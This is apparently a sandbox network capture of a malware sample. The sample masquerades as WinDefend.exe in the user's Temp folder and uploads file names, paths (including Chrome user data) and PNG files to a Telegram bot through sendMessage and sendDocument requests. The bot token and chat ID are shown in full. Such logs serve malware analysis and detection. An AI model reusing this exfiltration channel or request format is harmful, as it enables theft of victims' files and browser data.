2024-05-23 13:35:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
185	192.168.2.5	61234	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:32 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:32 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+32.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
186	192.168.2.5	61235	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:32 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="1b6802e2-281d-4a3a-9fad-3499b7ea5b33" Host: api.telegram.org Content-Length: 2334 Expect: 100-continue
2024-05-23 13:35:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:32 UTC	40	OUT	Data Raw: 2d 2d 31 62 36 38 30 32 65 32 2d 32 38 31 64 2d 34 61 33 61 2d 39 66 61 64 2d 33 34 39 39 62 37 65 61 35 62 33 33 0d 0a Data Ascii: --1b6802e2-281d-4a3a-9fad-3499b7ea5b33
2024-05-23 13:35:32 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 5f 53 74 61 72 5f 31 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 5f 53 74 61 72 5f 31 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=S_Star_14.png; filename*=utf-8''S_Star_14.png
2024-05-23 13:35:32 UTC	2004	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 38 08 06 00 00 01 df 81 0b 88 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 8b 49 44 41 54 68 05 ed 9a 6d 68 d5 55 18 c0 bd 77 9b db dc 14 1d a6 ab b4 17 1a b1 48 fc 10 65 d2 fc 52 44 65 94 06 d9 fc 52 84 a8 14 14 7b 75 eb 83 54 0b f2 43 38 f6 56 41 85 49 68 64 2d a1 57 8b 20 c8 84 85 03 89 c8 c2 24 d6 87 28 9a 59 9b d6 b6 70 af fd 9e db 3d 97 f3 ff df 73 fe f7 9c ff 76 6d 41 7f b8 9e 73 9e f7 e7 9c e7 9c f3 9c 67 2e 58 e0 fa d5 d7 d7 9f d4 69 93 fa 60 66 66 66 4d 5d 5d dd 8c 82 25 a4 a3 03 14 42 da 14 67 4f 4f 4f 8a 48 21 12 89 c4 09 81 05 c4 2a 24 e2 6f 54 fd 54 8b e8 71 05 30 aa c1 da 77 14 81 b4 01 b1 88 bb cf 88 ec ed ed 2d d0 11 d2 4f 34 36 36 5e 3f 35 35 f5 4d 18 21 d6 Data Ascii: PNGIHDR88gAMAaIDAThmhUwHeRDeR{uTC8VAIhd-W $(Yp=svmAsg.Xi`fffM]]%BgOOOH!*$oTTq0w-O466^?55M!
2024-05-23 13:35:32 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 62 36 38 30 32 65 32 2d 32 38 31 64 2d 34 61 33 61 2d 39 66 61 64 2d 33 34 39 39 62 37 65 61 35 62 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --1b6802e2-281d-4a3a-9fad-3499b7ea5b33Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:32 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:32 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 62 36 38 30 32 65 32 2d 32 38 31 64 2d 34 61 33 61 2d 39 66 61 64 2d 33 34 39 39 62 37 65 61 35 62 33 33 2d 2d 0d 0a Data Ascii: --1b6802e2-281d-4a3a-9fad-3499b7ea5b33--
2024-05-23 13:35:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
187	192.168.2.5	61236	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:33 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:33 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 66 34 33 64 38 63 36 64 61 39 30 37 65 33 34 61 62 32 30 32 38 65 66 31 35 37 33 33 34 31 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 36 66 34 33 64 38 63 36 64 61 39 30 37 65 33 34 61 62 32 30 32 38 65 66 31 35 37 33 33 34 31 32 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 38 35 Data Ascii: chat_id=1655240967&text=File%3A+6f43d8c6da907e34ab2028ef15733412.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C6f43d8c6da907e34ab2028ef15733412.png%0ASize%3A+585
2024-05-23 13:35:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:33 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
188	192.168.2.5	61237	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:33 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="63a4d1ae-ce52-4116-9f1d-1d6acc816699" Host: api.telegram.org Content-Length: 1874 Expect: 100-continue
2024-05-23 13:35:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:33 UTC	40	OUT	Data Raw: 2d 2d 36 33 61 34 64 31 61 65 2d 63 65 35 32 2d 34 31 31 36 2d 39 66 31 64 2d 31 64 36 61 63 63 38 31 36 36 39 39 0d 0a Data Ascii: --63a4d1ae-ce52-4116-9f1d-1d6acc816699
2024-05-23 13:35:33 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=32.png; filename*=utf-8''32.png
2024-05-23 13:35:33 UTC	1558	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 05 dd 49 44 41 54 58 85 ed 56 5d 88 1e 67 15 7e 9e f7 7d 67 be 6f 33 fb f3 6d 52 49 d2 c6 6d d3 98 0a 16 24 31 bb d6 18 49 ba 21 5e 15 ac 2d 6e a1 10 a5 14 a9 77 52 4b 54 e8 8d 8b 37 42 0b ae 37 16 04 0b 16 c5 c2 06 8b 36 a2 16 b2 cd 16 db 9a 36 b6 29 a5 15 52 7f 28 0d 5d 43 e2 66 77 b3 df b7 df cf cc fb 3e 5e cc cc b7 db 64 77 5d 63 bd eb 81 81 19 e6 9c e7 3c e7 39 ef 9c 33 c0 47 b6 c2 c6 01 33 09 58 01 fc b0 b1 25 50 93 b0 1a 87 59 dd e1 aa a4 c2 1a 8e d7 97 dc 5c f5 dc cd e5 ca 1b 02 fa d3 cd db 3f d3 6b e3 ed 0b 69 38 cb f3 e7 67 4a 52 04 74 5d 89 cb 78 22 2c fd 0e 3b e2 9a dd 13 1a fe 7d 12 67 4b 1f 03 80 a7 00 f7 e2 ce a1 a7 22 1b bf 96 92 bf ad Data Ascii: PNGIHDR szzIDATXV]g~}go3mRIm$1I!^-nwRKT7B766)R(]Cfw>^dw]c<93G3X%PY\?ki8gJRt]x",;}gK"
2024-05-23 13:35:34 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 33 61 34 64 31 61 65 2d 63 65 35 32 2d 34 31 31 36 2d 39 66 31 64 2d 31 64 36 61 63 63 38 31 36 36 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --63a4d1ae-ce52-4116-9f1d-1d6acc816699Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:34 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:34 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 33 61 34 64 31 61 65 2d 63 65 35 32 2d 34 31 31 36 2d 39 66 31 64 2d 31 64 36 61 63 63 38 31 36 36 39 39 2d 2d 0d 0a Data Ascii: --63a4d1ae-ce52-4116-9f1d-1d6acc816699--
2024-05-23 13:35:34 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
189	192.168.2.5	61238	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:33 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 207 Expect: 100-continue
2024-05-23 13:35:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:34 UTC	207	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 66 69 6c 65 5f 74 79 70 65 73 25 35 43 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+aic_file_icons.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cfile_types%5Caic_file_icons.png%0ASize%3A+63+KB
2024-05-23 13:35:34 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
190	192.168.2.5	61239	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:36 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="fbe5c923-ed21-4db8-a822-fbb2407010e8" Host: api.telegram.org Content-Length: 600025 Expect: 100-continue
2024-05-23 13:35:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:36 UTC	40	OUT	Data Raw: 2d 2d 66 62 65 35 63 39 32 33 2d 65 64 32 31 2d 34 64 62 38 2d 61 38 32 32 2d 66 62 62 32 34 30 37 30 31 30 65 38 0d 0a Data Ascii: --fbe5c923-ed21-4db8-a822-fbb2407010e8
2024-05-23 13:35:36 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 66 34 33 64 38 63 36 64 61 39 30 37 65 33 34 61 62 32 30 32 38 65 66 31 35 37 33 33 34 31 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 66 34 33 64 38 63 36 64 61 39 30 37 65 33 34 61 62 32 30 32 38 65 66 31 35 37 33 33 34 31 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=6f43d8c6da907e34ab2028ef15733412.png; filename*=utf-8''6f43d8c6da907e34ab2028ef15733412.png
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 49 00 00 04 7e 08 02 00 00 00 a9 e2 6e c8 00 00 80 00 49 44 41 54 78 da ec 9d 07 5c 14 d7 16 87 31 a6 bc 94 97 bc 97 5e 5e 9a bd 2b f6 16 35 76 11 7b c4 ae 01 44 41 04 c4 0e a2 c1 de 11 ec 5d 8c 8a bd 8b 11 bb 82 15 45 8a d2 fb f6 de d9 9d fe a6 ec 2e c3 52 44 05 63 f4 7c b9 d9 df ba cc ee de bd 33 73 e6 ce f9 df 73 8e 53 e8 c2 05 7f 2c 0a 5e b0 74 d6 fc e5 d3 e7 af 08 64 db 34 db 93 92 6d 65 60 c8 b2 69 f3 16 4f 9b bb 30 60 66 90 9f 7f a0 af ef d4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 ca d4 a9 53 67 ce 9c 39 7f fe fc 05 0b 16 84 84 84 38 fd b1 68 5e e8 1f 0b 17 85 ac 5a 1c 14 be 38 28 6c 51 f0 ea 45 f3 56 95 6a f4 8b ab 17 cf 5b 13 3a 6b cd 3c ff 55 f3 03 57 2f 5f 18 16 11 11 Data Ascii: PNGIHDRI~nIDATx\1^^+5v{DA]E.RDc\|3ssS,^td4me`iO0`f)Sg98h^Z8(lQEVj[:k<UW/_
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: aa e9 25 74 1a 27 f8 d8 5f 74 f2 91 91 b0 6a 1b 90 94 0a 00 00 00 28 c6 ee b3 a6 9f c7 c4 c4 0c 1a 34 c8 d9 d9 79 e6 cc 99 77 ef de 2d 2a 2a e2 e7 a1 c2 a0 b4 c6 df 9d 9f 8a 1f 64 63 36 9b 2f 5c b8 30 7a f4 e8 fa f5 eb f7 ed db f7 f2 e5 cb 5c 5d 71 fb ce 02 6d 03 00 00 00 00 aa 58 db 20 6d da 86 d1 8c 36 5b 28 75 1a 53 58 73 92 f0 df 01 22 ce 5d f8 79 c9 f6 19 fb f8 71 80 f8 1d 1f d1 fb 3e a2 3e 11 8a 9d b1 fa 7d 77 0c 73 4e 68 dc b6 2b 47 ee 50 8e db ad 9a b0 47 35 7e 37 34 68 d0 a0 bd 40 db a3 a2 8d c9 a8 1d 2a b7 6d 4a cf bd aa 35 17 75 47 1f 1a 67 1f d7 d4 0e 91 bc e5 2d fc 17 bb 1a fa b3 52 06 ea 0b 2e 7a 63 ba f8 7d 3f 91 d3 ef 82 b7 27 09 5d 37 2a 22 ae e8 d7 5d d6 4d de af 1a ba 55 49 9b a9 71 bb c0 46 41 83 06 ed 45 0d 14 67 46 86 6f 53 0e da ac Data Ascii: %t'_tj(4yw-*dc6/\0z\]qmX m6[(uSXs"]yq>>}wsNh+GPG5~74h@mJ5uGg-R.zc}?']7*"]MUIqFAEgFoS
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: fd e3 b5 8d d2 7f 75 48 a3 f4 0f 4a 8e 54 7d 3c 87 07 9f 5f 18 7c 71 68 68 69 89 28 e1 e1 c3 d7 a0 60 38 68 1b 00 00 54 39 3c d7 21 57 7d 97 9b 88 10 bc 7f 16 17 f5 b5 3b 0d 01 00 00 5e 9a 8d b2 06 64 38 da 25 07 63 c5 46 95 81 d3 10 00 80 97 6b a0 ec 6b 44 ca 9a 38 f1 cd 14 a4 a2 02 00 00 00 8a b1 7b a8 8d 46 e3 b6 6d db 86 0d 1b e6 e5 e5 45 3f c9 c9 c9 79 09 da 06 82 e2 28 4a 60 56 bd 81 c0 e5 b1 f1 eb 86 cf ef f5 6d af a6 df d5 6b de ba 49 5f f7 91 8b 8e 46 de 53 15 98 29 bc 38 06 82 ee 95 10 43 0b 24 12 79 96 40 ad 50 0b 71 75 4c fa d9 e0 a0 81 dd da 7d d1 c8 1a b7 f1 48 93 88 51 96 e2 b7 20 94 a9 d0 90 7f 2f 33 31 f6 ee dd 7b b7 6e df b9 7b 3b ee 4e ec d5 4b 37 ef 9f 7d 50 78 af b0 48 69 b1 27 a7 22 30 9c b4 c9 1f 66 ca 24 12 3c 4e 78 18 7b fb 76 dc Data Ascii: uHJT}<_\|qhhi(`8hT9<!W};^d8%cFkkD8{FmE?y(J`VmkI_FS)8C$y@PquL}HQ /31{n{;NK7}PxHi'"0f$<Nx{v
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: c0 b8 2b 48 25 e2 22 ec c2 3f 49 15 df 61 13 76 5d 84 bf 25 fd 25 38 61 bb 1f b6 6e cc fa e3 f0 ca 5f 3b 99 0f a1 bb ca ac 66 a0 bf 1a b5 66 a7 e2 26 56 38 dc 55 03 ff 78 08 9c 3d 13 cb 93 36 38 87 df cb ab 31 c3 c4 1e 30 5d a2 b8 c2 36 d6 33 8e 29 1f 41 10 b6 53 98 3d f7 49 eb 1a 25 92 d1 1a ab b9 73 6c 0a 14 a2 d8 99 4d 72 79 9f 08 8a 1d 96 57 c3 0c 94 74 d9 73 35 37 ac 16 15 7d 91 5f 5e 4a 4b b6 ed 04 de 3f 98 bd 83 b3 02 30 69 fb 13 c9 b7 cf 8e bd a2 d8 5e fd 3d 3e 5c dc 36 4a 64 f1 75 87 51 26 2a 1d e8 c2 ba 59 49 ae a2 25 77 88 32 67 10 73 59 c1 e1 8a f0 2a fb 4c 38 db 52 ae ad 7b 86 49 48 95 98 14 fb 4c 86 7f b2 30 33 99 bf 25 36 14 65 0f e3 e2 c9 92 d5 b6 d2 26 ae 78 66 e5 a8 0b 5a 4f 67 e6 34 a8 56 f1 bb f4 58 b1 e7 2e 41 62 b0 c4 04 00 00 e0 35 Data Ascii: +H%"?Iav]%%8an_;ff&V8Ux=6810]63)AS=I%slMryWts57}_^JK?0i^=>\6JduQ&YI%w2gsYL8R{IHL03%6e&xfZOg4VX.Ab5
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 0e 0d ad 56 6d e3 39 ba e7 00 df b9 cf 97 1c aa 5c db 28 af 3a 77 05 5f 61 8f a8 28 9d 7e aa aa b4 0d 7e d0 46 05 21 3b af 82 b6 f1 e2 fb fa a9 bb 1b 00 5e 5f 9f 2a ca 79 19 d8 09 83 05 4f 0f 4b 5f d7 65 c5 c8 5f 7a 0f 9d d3 61 71 7c 50 3c f2 c4 42 61 cc 5d 18 46 df 4b b3 97 42 76 45 a1 e3 bd 1d a3 6d 24 44 4c fb e3 1b e7 71 75 7e 9f 1b 99 7c 81 a9 db 55 1e 45 84 e9 cc 8d f9 1e 73 1a 0f 76 f7 39 b0 3a 9b 7a 58 ac 6d 58 b8 39 94 b5 a8 06 59 5e c9 01 fa 4a a9 37 ca 73 33 2f c6 df 3d f2 30 39 51 2c a5 af 73 94 63 72 cd f2 8b 15 10 24 4e 92 95 d8 8e b9 d9 c5 b8 5b 71 b2 fc 37 b0 99 ed f1 f2 37 20 cb f9 13 49 50 10 bc 01 d8 f5 45 6b c0 35 49 61 92 a2 8c e3 f7 d6 7a af 18 f1 db 78 f7 59 9e 2b 76 2d df 7b f8 c0 de 3d 47 76 ee 89 8a 8a 3e 13 97 f9 50 49 4a 4a 69 Data Ascii: Vm9\(:w_a(~~F!;^_*yOK_e_zaq\|P<Ba]FKBvEm$DLqu~\|UEsv9:zXmX9Y^J7s3/=09Q,scr$N[q77 IPEk5IazxY+v-{=Gv>PIJJi
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: b2 6c 7b 87 d2 6b 73 ae 5d 5a 39 67 e1 f0 41 a3 fa 0f e8 dd 7f d4 d0 71 f3 16 45 de bc a8 a2 a4 f6 25 bd f4 41 82 70 25 46 e8 8f d5 e1 a6 db c9 67 16 ad 1b d5 7b d0 cf 8d 5a fc dc a4 49 8b d6 5d 47 f9 7a 6e be b9 21 11 7d 58 44 19 2c 22 71 dc d1 e8 90 d5 5b 43 8e 9f 8a 93 2a 18 f7 a4 d4 9c b3 e7 84 ef 94 e0 41 8b 96 6e 4b 38 27 a7 e4 14 6e 29 bc 1e 37 77 d2 9c 9f 07 cc 5c 79 e5 8c 1c 17 b1 4b d6 29 02 2b 76 cc d2 ff d0 e7 09 63 23 2f 2c 76 5f 3d be df c4 21 2e 83 5c 5c 07 0d 18 32 c2 37 64 46 64 ec fe 54 8b d0 aa f6 68 15 19 f7 ae 6f 3c 70 3a 64 fb d5 1d 3b af 9c db b6 71 d3 fc 71 e3 46 0e 70 19 30 6a f2 f4 c0 1d 97 36 c4 eb ef ab 28 53 89 f5 ce 08 ae 7a 70 27 74 5a 44 8f 9e 1e bd fa f5 0b 98 da 67 c3 ca e1 4b 97 4c 1d ee bb d8 6d 41 c4 de f8 e3 5a 24 cb Data Ascii: l{ks]Z9gAqE%Ap%Fg{ZI]Gzn!}XD,"q[C*AnK8'n)7w\yK)+vc#/,v_=!.\\27dFdTho<p:d;qqFp0j6(Szp'tZDgKLmAZ$
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: f6 aa 7a b1 3e 41 49 45 65 61 45 05 d6 6e fa 22 22 5f dc bf ff c0 cb b2 68 b3 13 3a 1d 0a 39 10 9b 2b 7a 4b eb bf 4e 8a dc d1 90 f7 4a 71 4c af cc 4d 8b ac 0d d1 09 33 12 bd 75 5b ef e3 a7 e9 7a 69 8b 43 38 3e ca 32 82 ea 0b aa 4e f5 f4 f4 2d f4 8d 69 ce 2e 28 48 8f f3 77 30 72 b4 b6 4a cf 6d 59 db 84 e6 00 28 f2 72 61 ad 8d 82 e1 57 57 44 ee 29 8b 39 c7 1b bd 7c 93 da ba b8 42 25 d0 a8 1b 9b ed 05 65 66 30 1f 7d 0b bb f0 48 d7 f4 e2 e8 ec d7 35 9d f3 53 44 1a 16 0a 4e 40 41 32 96 20 4c 26 30 26 9b 17 36 65 e2 e8 1b 6f a7 d2 3d 63 55 25 f5 65 24 b5 3d 82 fd 5b 57 db f0 10 95 f9 91 5c 5a 1a 0d df d3 97 64 ed 7c f2 f4 b3 df 5f 14 91 b2 d1 8d 2e 0c ce 2e 2c 89 75 2d 76 93 76 d2 94 bf f1 22 f8 0e bc 3f 76 80 c2 ab 67 62 62 99 9b e5 f3 f5 4e e9 91 81 ae 01 f5 Data Ascii: z>AIEeaEn""_h:9+zKNJqLM3u[ziC8>2N-i.(Hw0rJmY(raWWD)9\|B%ef0}H5SDN@A2 L&0&6eo=cU%e$=[W\Zd\|_..,u-vv"?vgbbN
